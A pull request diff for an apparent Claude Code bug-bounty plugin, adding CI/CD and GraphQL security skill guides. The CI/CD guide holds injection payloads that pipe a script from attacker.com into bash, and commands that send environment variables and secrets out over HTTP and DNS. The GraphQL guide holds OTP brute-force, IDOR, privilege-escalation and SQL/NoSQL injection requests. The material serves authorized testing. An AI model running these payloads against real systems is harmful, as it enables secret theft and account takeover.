### PR TITLE
feat: add GraphQL audit skill + tool — introspection, batching DoS, IDOR, injection

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -35,3 +35,4 @@ venv/
 *.out
 nmap-output/
 .atlas/
+.forge/

--- a/.gitignore
+++ b/.gitignore
@@ -34,3 +34,4 @@ venv/
 # Tool output
 *.out
 nmap-output/
+.atlas/

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -4,7 +4,7 @@ This repo is a Claude Code plugin for professional bug bounty hunting across Hac
 
 ## What's Here
 
-### Skills (9 domains — load with `/bug-bounty`, `/web2-recon`, `/token-scan`, etc.)
+### Skills (10 domains — load with `/bug-bounty`, `/web2-recon`, `/token-scan`, etc.)
 
 | Skill | Domain |
 |---|---|
@@ -19,6 +19,7 @@ This repo is a Claude Code plugin for professional bug bounty hunting across Hac
 | `skills/triage-validation/` | 7-Question Gate, 4 gates, never-submit list, conditionally valid table |
 | `skills/credential-attack/` | Password spray methodology — when/why, 4-stage pipeline, mode selection, lockout tactics, legal guardrails, pitfalls learned from live tests |
 | `skills/mobile-pentest/` | Android/iOS app pentest — runtime-first proxy workflow, APK/IPA decompile for hidden endpoints + secrets, deeplink/exported-activity injection, WebView bridge, SSL pinning bypass |
+| `skills/cicd-security/` | CI/CD pipeline hunting — GitHub Actions injection, secret exfil, self-hosted runner poisoning, OIDC abuse, supply chain attacks |
 
 ### Commands (21 slash commands)
 

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -20,6 +20,7 @@ This repo is a Claude Code plugin for professional bug bounty hunting across Hac
 | `skills/credential-attack/` | Password spray methodology — when/why, 4-stage pipeline, mode selection, lockout tactics, legal guardrails, pitfalls learned from live tests |
 | `skills/mobile-pentest/` | Android/iOS app pentest — runtime-first proxy workflow, APK/IPA decompile for hidden endpoints + secrets, deeplink/exported-activity injection, WebView bridge, SSL pinning bypass |
 | `skills/cicd-security/` | CI/CD pipeline hunting — GitHub Actions injection, secret exfil, self-hosted runner poisoning, OIDC abuse, supply chain attacks |
+| `skills/graphql-audit/` | GraphQL hunting — introspection, field suggestions (clairvoyance), batching DoS, IDOR via aliasing, injection, auth bypass, depth bombs |
 
 ### Commands (21 slash commands)
 
@@ -55,6 +56,7 @@ This repo is a Claude Code plugin for professional bug bounty hunting across Hac
 | `/osint-employees` | `/osint-employees <target>` — employee names + emails (theHarvester + username-anarchy, opt-in LinkedIn); requires `--with-credential-attack` |
 | `/breach-check` | `/breach-check <wordlist>` — HIBP k-anonymity rank wordlist by real-world breach count |
 | `/spray` | `/spray <url> --mode http-form\|oauth\|o365\|okta --users <f> --passes <f>` — password spray with hard guards (typed-host confirm, lockout warn, audit log) |
+| `/graphql-audit` | `/graphql-audit <url>` — full GraphQL audit: introspection, batching DoS, IDOR, injection, alias bomb, graphw00f fingerprint |
 
 ### Agents (9 specialized agents)
 
@@ -96,6 +98,7 @@ This repo is a Claude Code plugin for professional bug bounty hunting across Hac
 - `tools/osint_employees.sh` — employee names + email patterns for spray prep (theHarvester + username-anarchy, opt-in CrossLinked); requires `--with-credential-attack`
 - `tools/breach_checker.py` — HIBP k-anonymity wordlist enrichment; ranks passwords by breach count (no API key, free)
 - `tools/spray_orchestrator.sh` — password spray with typed-hostname guard + lockout warning + audit log; modes: http-form / oauth / o365 / okta (TREVOR); requires `--with-credential-attack` for TREVOR modes
+- `tools/graphql_audit.sh` — 7-phase GraphQL audit: introspection + schema dump, graphw00f fingerprint, clairvoyance field discovery, batching DoS, alias bomb, gqlmap injection, graphql-cop checklist
 
 ### External tool references
 

--- a/README.md
+++ b/README.md
@@ -11,26 +11,51 @@
 
 <p align="center">
   <a href="https://github.com/shuvonsec/claude-bug-bounty/blob/main/LICENSE"><img src="https://img.shields.io/badge/License-MIT-yellow.svg?style=flat-square" alt="MIT License"></a>
-  <img src="https://img.shields.io/badge/Python-3.8+-3776AB.svg?style=flat-square&logo=python&logoColor=white" alt="Python 3.8+">
-  <img src="https://img.shields.io/badge/Standalone-Free_Mode-brightgreen.svg?style=flat-square" alt="Free Standalone Mode">
+  <img src="https://img.shields.io/badge/Python-3.9+-3776AB.svg?style=flat-square&logo=python&logoColor=white" alt="Python 3.9+">
+  <img src="https://img.shields.io/badge/Standalone-Free-brightgreen.svg?style=flat-square" alt="Free Standalone Mode">
   <a href="https://claude.ai/claude-code"><img src="https://img.shields.io/badge/Claude_Code-Plugin-D97706.svg?style=flat-square" alt="Claude Code Plugin"></a>
-  <a href="#contributing"><img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square" alt="PRs Welcome"></a>
   <a href="https://star-history.com/#shuvonsec/claude-bug-bounty"><img src="https://img.shields.io/github/stars/shuvonsec/claude-bug-bounty?style=flat-square&color=yellow" alt="GitHub Stars"></a>
 </p>
 
 <p align="center">
-  <a href="https://star-history.com/#shuvonsec/claude-bug-bounty&Date">
-    <picture>
-      <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=shuvonsec/claude-bug-bounty&type=Date&theme=dark" />
-      <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=shuvonsec/claude-bug-bounty&type=Date" />
-      <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=shuvonsec/claude-bug-bounty&type=Date" />
-    </picture>
-  </a>
+  <a href="#-standalone-mode--no-subscription-required"><b>Free Setup</b></a>
+  &nbsp;·&nbsp;
+  <a href="#quick-start"><b>Quick Start</b></a>
+  &nbsp;·&nbsp;
+  <a href="#commands"><b>Commands</b></a>
+  &nbsp;·&nbsp;
+  <a href="#what-it-finds"><b>What It Finds</b></a>
+  &nbsp;·&nbsp;
+  <a href="#installation"><b>Install</b></a>
+  &nbsp;·&nbsp;
+  <a href="FAQ.md"><b>FAQ</b></a>
 </p>
 
-<p align="center">
-  <a href="#-standalone-mode--no-subscription-required">Free Setup</a> · <a href="#quick-start">Quick Start</a> · <a href="#commands">Commands</a> · <a href="#what-it-finds">What It Finds</a> · <a href="#installation">Install</a> · <a href="FAQ.md">FAQ</a>
-</p>
+---
+
+<p align="center"><sub>Here's what you see when you launch it.</sub></p>
+
+```
+██████  ██████  ██   ██ ██   ██ ███   █ ███████
+██   ██ ██   ██ ██   ██ ██   ██ ████  █   ███
+██████  ██████  ███████ ██   ██ ██ ██ █   ███
+██████  ██████  ███████ ██   ██ ██  ███   ███
+██   ██ ██   ██ ██   ██ ██   ██ ██   ██   ███
+██████  ██████  ██   ██ ███████ ██   ██   ███
+
++ Recon. Hunt. Validate. Report. +
+
+┌──────────────────────────────────────────────────────┐
+│ Target  target.com                                   │
+│ Mode    full                                         │
+│ Output  recon/target.com/                            │
+│ Auth    session loaded                               │
+└──────────────────────────────────────────────────────┘
+
+ ● local   Ready   type /hunt to begin
+
+bbhunter v4.3
+```
 
 ---
 
@@ -276,19 +301,28 @@ Nine specialists, each built for one job:
 
 ## How It Works
 
+<div align="center">
+
 ```
-You  →  /recon  →  /hunt  →  /validate  →  /report
-              ↓                     ↓
-         Hunt Memory          7-Question Gate
-      (persists across      (kills weak findings
-          sessions)          before you submit)
+   You ─▶ /recon ─▶ /hunt ─▶ /validate ─▶ /report
+              │                  │
+              ▼                  ▼
+        Hunt Memory       7-Question Gate
+   (persists across    (kills weak findings
+       sessions)         before you submit)
 ```
+
+</div>
 
 Every tool in the pipeline is gated on whether it's installed — missing tools are skipped, not errors. Auth headers set once carry through httpx · katana · ffuf · nuclei · dalfox automatically.
 
 ---
 
 ## Project Structure
+
+<details>
+<summary><b>Click to expand the full tree</b></summary>
+<br>
 
 ```
 claude-bug-bounty/
@@ -360,6 +394,8 @@ claude-bug-bounty/
 └── TERMS.md                   # Terms of use + authorized testing only
 ```
 
+</details>
+
 ---
 
 ## Installation
@@ -413,17 +449,17 @@ echo 'export CHAOS_API_KEY="your-key"' >> ~/.zshrc
 
 ## Rules
 
-These run every session, no exceptions:
+Seven rules run every session, no exceptions:
 
-```
-1. Read full scope first — only test what the program says you can
-2. Real bugs only       — "Can an attacker do this RIGHT NOW?" if no, stop
-3. Kill weak findings   — 30-second check saves hours of wasted reporting
-4. Never go out of scope — one wrong request can get you banned
-5. 5-minute rule        — no progress after 5 min? move to the next target
-6. Validate before report — /validate before spending 30 min writing
-7. Impact first         — test the bugs with the worst consequences first
-```
+| # | Rule | Why |
+|:-:|:---|:---|
+| 1 | **Read full scope first** | Only test what the program authorizes |
+| 2 | **Real bugs only** | "Can an attacker do this RIGHT NOW?" — if no, stop |
+| 3 | **Kill weak findings** | A 30-second check saves hours of wasted reporting |
+| 4 | **Never go out of scope** | One wrong request can get you banned |
+| 5 | **5-minute rule** | No progress after 5 minutes? Move on |
+| 6 | **Validate before report** | `/validate` before spending 30 minutes writing |
+| 7 | **Impact first** | Test the bugs with the worst consequences first |
 
 ---
 

--- a/skills/cicd-security/SKILL.md
+++ b/skills/cicd-security/SKILL.md
@@ -1,0 +1,381 @@
+---
+name: cicd-security
+description: CI/CD pipeline security hunting — GitHub Actions workflow injection, secret exfiltration, self-hosted runner poisoning, dependency confusion, OIDC token theft, and supply chain attacks. Covers sisakulint scanning, manual workflow analysis, and chaining CI/CD bugs into critical findings. Use when a target has public repos, GitHub Actions, CircleCI, Jenkins, or GitLab CI.
+---
+
+# CI/CD SECURITY — Pipeline Attack Surface
+
+> CI/CD pipelines are high-value targets — a single workflow injection can give you code execution on the build server, read ALL org secrets, and push backdoored releases to production.
+
+---
+
+## 0. QUICK KILL CHECKLIST
+
+```
+[ ] Run cicd_scanner.sh <owner/repo> — catch low-hanging workflow lint issues
+[ ] Check for script injection: ${{ github.event.*.body/title/name }}
+[ ] Find secrets referenced in env: — test if they leak in logs
+[ ] Check pull_request_target with checkout of untrusted code
+[ ] Look for self-hosted runners on public repos
+[ ] Search for OIDC token requests without audience restriction
+[ ] Check for unpinned actions (uses: owner/action@main)
+[ ] Look for workflow_dispatch with no input validation
+[ ] Find artifact downloads without integrity checks
+[ ] Search for GITHUB_TOKEN with write permission used insecurely
+```
+
+---
+
+## 1. TOOL — cicd_scanner.sh
+
+```bash
+# Single repo
+bash tools/cicd_scanner.sh owner/repo
+
+# Org-wide (up to 30 repos)
+bash tools/cicd_scanner.sh "org:orgname" --limit 50 --parallel 5
+
+# Scan with recursive reusable workflow analysis
+bash tools/cicd_scanner.sh owner/repo --recursive --depth 5
+
+# Custom output
+bash tools/cicd_scanner.sh owner/repo --output-dir ./findings/target/cicd
+```
+
+**Output:** `findings/<target>/cicd/scan_results.txt` + `summary.txt`
+
+**What sisakulint finds:**
+- Script injection via untrusted context
+- Unpinned actions (tag instead of SHA)
+- `pull_request_target` misuse
+- Dangerous patterns (`eval`, `curl | bash`, etc.)
+- Exposed secret names in `run:` blocks
+
+---
+
+## 2. WORKFLOW INJECTION (Critical — Most Common Paid Bug)
+
+### What It Is
+GitHub Actions exposes PR/issue data as context variables. If injected into a `run:` block without sanitization, an attacker controls shell code.
+
+### Vulnerable Pattern
+```yaml
+# VULNERABLE — attacker controls pr.title
+- name: Print PR title
+  run: echo "Title: ${{ github.event.pull_request.title }}"
+  # Attacker PR title: "; curl attacker.com/shell.sh | bash #"
+```
+
+### Safe Pattern
+```yaml
+# SAFE — pass through env var, never interpolate directly
+- name: Print PR title
+  env:
+    PR_TITLE: ${{ github.event.pull_request.title }}
+  run: echo "Title: $PR_TITLE"
+```
+
+### Injectable Contexts (always check these)
+```
+github.event.pull_request.title
+github.event.pull_request.body
+github.event.pull_request.head.ref        ← branch names
+github.event.issue.title
+github.event.issue.body
+github.event.comment.body
+github.event.review.body
+github.event.review_comment.body
+github.event.discussion.title
+github.event.discussion.body
+github.head_ref                            ← alias for branch name
+github.event.inputs.*                      ← workflow_dispatch inputs
+```
+
+### PoC Payload
+```
+# PR title / issue title payload:
+"; wget -q -O- attacker.com/$(cat /etc/hostname | base64) #
+```
+
+### Detection Grep
+```bash
+# Find injectable patterns in .github/workflows/
+grep -rn '\${{.*github\.event\.\(pull_request\|issue\|comment\|review\|discussion\)' .github/workflows/
+grep -rn '\${{.*github\.head_ref' .github/workflows/
+grep -rn '\${{.*github\.event\.inputs' .github/workflows/
+```
+
+---
+
+## 3. pull_request_target MISUSE (Critical)
+
+### What It Is
+`pull_request_target` runs in the context of the BASE repo (has secrets) but can be tricked into checking out and running attacker code.
+
+### Vulnerable Pattern
+```yaml
+on: pull_request_target
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}  # ← attacker code!
+      - run: npm test  # runs attacker's package.json scripts
+```
+
+### Why It's Critical
+- `pull_request_target` has access to secrets
+- Checkout uses the PR's code
+- Any `run:` step executes attacker-controlled code with access to all org secrets
+
+### Detection
+```bash
+grep -rn 'pull_request_target' .github/workflows/
+# Then check if the same job does a checkout of the PR head
+grep -A 20 'pull_request_target' .github/workflows/*.yml | grep -E '(head\.sha|head_ref|checkout)'
+```
+
+---
+
+## 4. SECRET EXFILTRATION
+
+### Secrets That Appear in Logs
+```bash
+# Search for secrets echoed in run: blocks
+grep -rn 'echo.*secrets\.' .github/workflows/
+grep -rn 'cat.*secrets\.' .github/workflows/
+grep -rn 'env.*secrets\.' .github/workflows/ | grep -v '^#'
+```
+
+### GITHUB_TOKEN Abuse
+The auto-generated `GITHUB_TOKEN` can be used to:
+- Push code to branches
+- Create releases
+- Read all private repo content
+- Approve PRs (if permissions allow)
+
+```yaml
+# Check for overly broad permissions
+permissions:
+  contents: write    # ← Can push/delete code
+  packages: write    # ← Can push malicious packages
+  pull-requests: write
+```
+
+### PoC — Exfil via DNS
+```bash
+# In an injected run: block
+curl "https://attacker.com/?d=$(printenv | base64 -w0)"
+# Or via DNS (more stealthy)
+nslookup "$(printenv SECRET | md5sum | cut -c1-20).attacker.com"
+```
+
+---
+
+## 5. SELF-HOSTED RUNNER POISONING
+
+### Why It Matters
+Public repos with self-hosted runners allow ANY fork to queue jobs on internal machines.
+
+### Detection
+```bash
+# In workflow files
+grep -rn 'self-hosted' .github/workflows/
+# Combined with — does the repo accept PRs from forks?
+# Pull triggers that run on self-hosted
+grep -B5 'self-hosted' .github/workflows/*.yml | grep -E '(pull_request|push)'
+```
+
+### Exploit Path
+1. Fork public repo that uses self-hosted runners
+2. Open PR with malicious workflow step
+3. Job runs on internal self-hosted runner
+4. Access internal network, read instance metadata, exfil secrets
+
+### PoC Workflow Addition
+```yaml
+# Attacker adds to fork:
+jobs:
+  pwn:
+    runs-on: self-hosted
+    steps:
+      - name: Recon
+        run: |
+          curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ \
+            | xargs -I{} curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{}
+```
+
+---
+
+## 6. OIDC TOKEN THEFT / CLOUD CREDENTIAL ABUSE
+
+### What It Is
+GitHub Actions can request short-lived cloud credentials via OIDC. Misconfigured trust policies allow any branch/repo to claim elevated AWS/GCP/Azure roles.
+
+### Detection
+```bash
+# Find OIDC usage
+grep -rn 'id-token.*write\|configure-aws-credentials\|google-github-actions\|azure/login' .github/workflows/
+```
+
+### Exploit: Overly Broad AWS Trust Policy
+```json
+{
+  "Condition": {
+    "StringEquals": {
+      "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
+      "token.actions.githubusercontent.com:sub": "repo:org/*:*"
+    }
+  }
+}
+```
+→ Any branch in the org can assume this role.
+
+### What to Check
+```
+1. What role does the workflow assume? (aws:role: ARN in workflow or secrets)
+2. Is the trust policy scoped to a specific branch? (ref:refs/heads/main)
+3. Can you trigger this from a fork or feature branch?
+4. What permissions does the role have?
+```
+
+---
+
+## 7. DEPENDENCY CONFUSION / SUPPLY CHAIN
+
+### Unpinned Actions
+```yaml
+# VULNERABLE — could be hijacked if maintainer's account is compromised
+uses: actions/checkout@v3
+
+# SAFE — pinned to a specific commit SHA
+uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+```
+
+### Dependency Confusion Attack
+1. Find `package.json` or `requirements.txt` that references internal packages
+2. Check if the internal package name is published on npm/PyPI
+3. Publish a malicious package with a higher version number
+4. Build server installs the public (malicious) one instead
+
+### Detection
+```bash
+# Find internal package names in config files
+grep -rn '"registry"' package.json .npmrc
+grep -rn 'index-url\|extra-index-url' requirements.txt pip.conf setup.py
+# Check if those package names exist on public registries
+```
+
+---
+
+## 8. BUG CLASS TABLE
+
+| Bug | Trigger | Severity | CVSS Range |
+|-----|---------|----------|-----------|
+| Workflow injection via PR title | `${{ github.event.pull_request.title }}` in `run:` | Critical | 9.0–10.0 |
+| `pull_request_target` + checkout | Accepts PRs from forks | Critical | 9.0–10.0 |
+| Self-hosted runner on public repo | `runs-on: self-hosted` + public repo | High | 7.5–9.0 |
+| OIDC trust too broad | Any-branch/any-repo claim | High | 7.5–8.5 |
+| Secret in log | `echo ${{ secrets.X }}` | Medium | 5.5–7.0 |
+| Unpinned action | `@main` / `@v1` tag | Low–Medium | 3.0–5.5 |
+| Artifact poisoning | Unsigned artifact download + exec | Medium | 5.5–7.0 |
+| `GITHUB_TOKEN` write abuse | Push to protected branch | Medium | 5.5–7.0 |
+| Dependency confusion | Internal pkg not on public registry | High | 7.5–9.0 |
+| `workflow_dispatch` injection | Unvalidated inputs in `run:` | Medium–High | 6.0–8.0 |
+
+---
+
+## 9. CHAINING CI/CD BUGS
+
+### Chain A: IDOR → CI/CD Secret Read
+```
+1. IDOR on /api/repos/{id}/settings → read CI/CD config
+2. Config references internal secret names
+3. Workflow injection to exfil those secrets
+→ Impact: Full org secret exfiltration
+```
+
+### Chain B: XSS → GitHub Token Theft
+```
+1. Stored XSS on internal GitHub Enterprise
+2. JS payload reads document.cookie / localStorage for GITHUB_TOKEN
+3. Token used to trigger workflow with malicious inputs
+→ Impact: RCE on build infrastructure
+```
+
+### Chain C: Supply Chain → Production Push
+```
+1. Find unpinned action (e.g., uses: corp/internal-action@main)
+2. Fork or compromise corp/internal-action
+3. Merge malicious code
+4. Next CI run pulls the compromised action with full repo write access
+→ Impact: Code execution, backdoored releases
+```
+
+---
+
+## 10. REPORT TEMPLATE
+
+```markdown
+## Summary
+GitHub Actions workflow in `<repo>` is vulnerable to **workflow injection** via the
+`github.event.pull_request.title` context variable, which is interpolated directly
+into a `run:` shell block. An attacker who opens a specially crafted PR can achieve
+arbitrary code execution on the build runner with full access to all repository secrets.
+
+## Steps to Reproduce
+1. Fork `<repo>`
+2. Open a PR with the following title:
+   `"; curl -s attacker.com/$(cat /etc/hostname | base64 -w0 | head -c 40) #`
+3. The CI workflow `.github/workflows/<name>.yml` runs and executes the injected command.
+4. Observe DNS/HTTP callback to attacker.com with hostname (or secret payload).
+
+## Impact
+- RCE on build runner
+- Read of all `${{ secrets.* }}` available to the workflow
+- Ability to push malicious code to repository or publish backdoored packages
+- Pivot to internal network if runner is self-hosted
+
+## Remediation
+Replace direct context interpolation with environment variable assignment:
+env:
+  PR_TITLE: ${{ github.event.pull_request.title }}
+run: echo "$PR_TITLE"
+
+## CVSS
+CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Critical, 10.0)
+```
+
+---
+
+## 11. SCOPE NOTES
+
+- Most bug bounty programs scope **public** repos only — confirm before touching private org repos.
+- Self-hosted runner attacks require a successful workflow run, which means opening a real PR — confirm the program allows this.
+- Never trigger a workflow that could affect production infrastructure without explicit written permission.
+- Always check `SECURITY.md` or the program policy for CI/CD-specific scope language.
+
+---
+
+## 12. TOOLS REFERENCE
+
+| Tool | Purpose | Install |
+|------|---------|---------|
+| `sisakulint` | Lint GitHub Actions workflows for security issues | `bash install_tools.sh` |
+| `trufflehog` | Find secrets leaked in git history / workflow logs | `bash install_tools.sh` |
+| `gitleaks` | Scan repos for hardcoded secrets | `bash install_tools.sh` |
+| `gh` CLI | Download workflow logs, list secrets, trigger runs | `brew install gh` |
+| `nuclei` | CI/CD-specific templates | `-tags cicd` |
+| `secrets_hunter.sh` | Wrapper for all three secret scanners | `bash tools/secrets_hunter.sh` |
+
+```bash
+# Download public workflow run logs (no auth needed)
+gh run list --repo owner/repo --limit 10
+gh run view <run-id> --log --repo owner/repo
+
+# List exposed secret names (names only — values never shown by API)
+gh secret list --repo owner/repo
+```

--- a/skills/graphql-audit/SKILL.md
+++ b/skills/graphql-audit/SKILL.md
@@ -1,0 +1,523 @@
+---
+name: graphql-audit
+description: GraphQL security hunting — introspection abuse, field suggestion enumeration (clairvoyance), batching DoS, IDOR via aliasing, auth bypass, injection via arguments, subscription abuse, depth/complexity bombs, and WAF bypass. Covers graphw00f fingerprinting, gqlmap, graphql-cop, and inql. Use when a target exposes a /graphql, /api/graphql, or GQL-over-HTTP endpoint.
+---
+
+# GRAPHQL SECURITY AUDIT
+
+> GraphQL flips the threat model — clients drive queries. One endpoint, infinite attack surface. Introspection hands you the schema; even without it, field suggestions give you 80% back.
+
+---
+
+## 0. QUICK KILL CHECKLIST
+
+```
+[ ] Run graphql_audit.sh <endpoint> — full automated sweep
+[ ] Check if introspection is enabled (__schema query)
+[ ] If introspection off — run clairvoyance for field discovery
+[ ] Fingerprint engine (graphw00f) — different engines, different CVEs
+[ ] Test query batching — send 100 identical queries in one POST
+[ ] Test alias bombing — 1000 aliases in one query
+[ ] Check field suggestions on typos — leaks schema even when introspection off
+[ ] Try IDOR: query another user's object by ID, no auth check
+[ ] Test field-level auth: query privileged fields (admin, role, internalNote)
+[ ] Inject SQLi/NoSQLi via string arguments — id, filter, search args
+[ ] Check subscriptions: can you subscribe to other users' events?
+[ ] Try introspection bypass: __schema\nquery, query batching, fragment tricks
+[ ] Look for mutation rate limiting — account takeover / self-XSS via mutations
+```
+
+---
+
+## 1. TOOL — graphql_audit.sh
+
+```bash
+# Basic audit
+bash tools/graphql_audit.sh https://target.com/graphql
+
+# With auth cookie
+bash tools/graphql_audit.sh https://target.com/api/graphql --cookie "session=abc123"
+
+# With Authorization header
+bash tools/graphql_audit.sh https://target.com/graphql --header "Authorization: Bearer TOKEN"
+
+# Through Burp proxy
+bash tools/graphql_audit.sh https://target.com/graphql --proxy http://127.0.0.1:8080
+
+# Custom output directory
+bash tools/graphql_audit.sh https://target.com/graphql --output-dir ./findings/target/graphql
+```
+
+**Output:** `findings/<target>/graphql/<timestamp>/`
+- `introspection.json` — full schema dump (if enabled)
+- `fingerprint.txt` — engine type (graphw00f)
+- `field_suggestions.txt` — discovered fields via clairvoyance
+- `batching_dos.txt` — response time delta for 1 vs 100 queries
+- `alias_bomb.txt` — alias depth test results
+- `gqlmap.txt` — injection scan results
+- `cop_report.txt` — graphql-cop attack checklist results
+- `summary.txt` — hit/miss per phase
+
+---
+
+## 2. INTROSPECTION — Schema Leak (Most Common First Step)
+
+### Check If Enabled
+
+```bash
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d '{"query":"{ __schema { queryType { name } } }"}' | jq .
+```
+
+### Full Schema Dump
+
+```bash
+# Pull complete introspection schema (pipe to InQL or graphql-voyager)
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d '{
+    "query": "query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"
+  }' | jq . > schema.json
+```
+
+### What To Look For In The Schema
+
+```
+- Mutations involving user data: updateUser, deleteAccount, changeEmail, changePassword
+- Queries returning other users' objects: user(id: X), order(id: X)
+- Fields: internalNote, adminOnly, role, isAdmin, rawPassword, apiKey
+- Types: AdminUser, InternalConfig, DebugInfo
+- Deprecated fields — often bypassed auth or forgotten
+- Subscription types — real-time data leaks
+```
+
+### Introspection Bypass Techniques
+
+When `__schema` is blocked, try:
+```bash
+# Newline injection (bypasses naive keyword filters)
+{"query": "query {\n  __schema\n  { queryType { name } } }"}
+
+# Fragment trick
+{"query": "fragment f on __Schema { queryType { name } } { ...f }"}
+
+# __type instead of __schema (often overlooked in blocklists)
+{"query": "{ __type(name: \"User\") { fields { name type { name } } } }"}
+
+# Via GET request (some servers allow GET, filter only POST)
+GET /graphql?query={__schema{queryType{name}}}
+
+# Over WebSocket (GraphQL subscriptions)
+# Different code path — introspection may be unrestricted
+```
+
+---
+
+## 3. FIELD SUGGESTION ABUSE (Introspection Off — Still Works)
+
+GraphQL engines return helpful "Did you mean X?" errors on typos. This leaks field names.
+
+### Manual Probe
+
+```bash
+# Typo on a known field to trigger suggestions
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d '{"query":"{ usr { id } }"}' | grep -i "suggest\|did you mean\|Cannot query"
+```
+
+### Clairvoyance (Automated — Recommended)
+
+```bash
+# Install
+pip install clairvoyance
+
+# Run field discovery against a known type
+clairvoyance -u https://target.com/graphql -o schema.json
+
+# With auth
+clairvoyance -u https://target.com/graphql \
+  -H "Authorization: Bearer TOKEN" \
+  -o schema.json
+
+# Seed with known type names (speeds up discovery significantly)
+clairvoyance -u https://target.com/graphql \
+  --input-document schema_partial.json \
+  -o schema_full.json
+```
+
+**What clairvoyance recovers:** type names, field names, argument names — ~80% of introspection output even when blocked.
+
+---
+
+## 4. BATCHING DoS (High Payout, Easy to Prove)
+
+GraphQL allows sending multiple operations in one POST. No rate limit = DoS or brute-force amplifier.
+
+### Array Batching (Most Common)
+
+```bash
+# 100 queries in one request — measure response time delta
+python3 -c "
+import json, sys
+q = {'query': '{ __typename }'}
+print(json.dumps([q] * 100))
+" | curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d @- -w '\nTime: %{time_total}s\n'
+```
+
+### Alias Batching (Bypasses per-query limits)
+
+```bash
+# 500 aliases — each alias is a separate resolver call
+python3 -c "
+aliases = ' '.join(f'q{i}: __typename' for i in range(500))
+print('{\"query\": \"{ ' + aliases + ' }\"}')
+" | curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d @-
+```
+
+### Impact Escalation
+
+- **Brute force amplifier:** 100 login mutations per HTTP request → bypasses per-IP lockout
+- **OTP bypass:** 1000 alias queries testing OTP codes in one request
+- **Password reset bombing:** 100 resetPassword mutations, each with a different email
+
+```bash
+# OTP brute force via alias batching — chain with account takeover
+python3 -c "
+import json
+mutations = []
+for code in range(1000, 2000):
+    mutations.append(f'v{code}: verifyOTP(code: \"{code}\", token: \"VICTIM_TOKEN\") {{ success }}')
+query = '{ ' + ' '.join(mutations) + ' }'
+print(json.dumps({'query': query}))
+" | curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d @-
+```
+
+---
+
+## 5. IDOR VIA DIRECT OBJECT ACCESS
+
+GraphQL queries often accept IDs directly. Test whether the server enforces ownership.
+
+### Basic IDOR Probe
+
+```bash
+# Logged in as user A (id=1) — query user B's data
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -H 'Cookie: session=USER_A_COOKIE' \
+  -d '{"query":"{ user(id: 2) { email phone address paymentMethods { last4 } } }"}'
+
+# Try orders, messages, invoices, appointments
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -H 'Cookie: session=USER_A_COOKIE' \
+  -d '{"query":"{ order(id: 999) { total items { name } user { email } } }"}'
+```
+
+### Field-Level IDOR (Privileged Fields on Accessible Objects)
+
+```bash
+# Object is yours — but are ALL fields yours to read?
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"{ me { id email role isAdmin internalNote rawApiKey } }"}'
+
+# Test privileged mutations on other users
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"mutation { updateUser(id: 2, role: \"admin\") { success } }"}'
+```
+
+### Enumeration via Aliases
+
+```bash
+# Enumerate 50 user IDs in one request
+python3 -c "
+import json
+aliases = [f'u{i}: user(id: {i}) {{ id email role }}' for i in range(1, 51)]
+print(json.dumps({'query': '{ ' + ' '.join(aliases) + ' }'}))
+" | curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d @-
+```
+
+---
+
+## 6. INJECTION VIA ARGUMENTS
+
+GraphQL arguments pass directly to resolvers. Resolvers often pass them to SQL/NoSQL queries without sanitization.
+
+### SQL Injection
+
+```bash
+# Classic SQLi probe via search/filter args
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"{ users(search: \"admin'\''--\") { id email } }"}'
+
+# Time-based blind SQLi
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"{ users(id: \"1 AND SLEEP(5)--\") { email } }"}'
+
+# gqlmap for automated injection
+gqlmap --target https://target.com/graphql \
+  --query '{ users(search: GQLMAP) { id email } }' \
+  --dbms mysql
+```
+
+### NoSQL Injection (MongoDB common in GraphQL backends)
+
+```bash
+# MongoDB operator injection via JSON coercion
+curl -s -X POST https://target.com/graphql \
+  -H 'Content-Type: application/json' \
+  -d '{"query":"{ login(username: {\"$gt\": \"\"}, password: {\"$gt\": \"\"}) { token } }"}'
+
+# Regex bypass
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"{ users(filter: {email: {\"$regex\": \".*\"}}) { id email } }"}'
+```
+
+### SSTI via Template-Rendered Fields
+
+```bash
+# If description/bio fields render in templates
+curl -s -X POST https://target.com/graphql \
+  -d '{"query":"mutation { updateProfile(bio: \"{{7*7}}\") { bio } }"}'
+```
+
+---
+
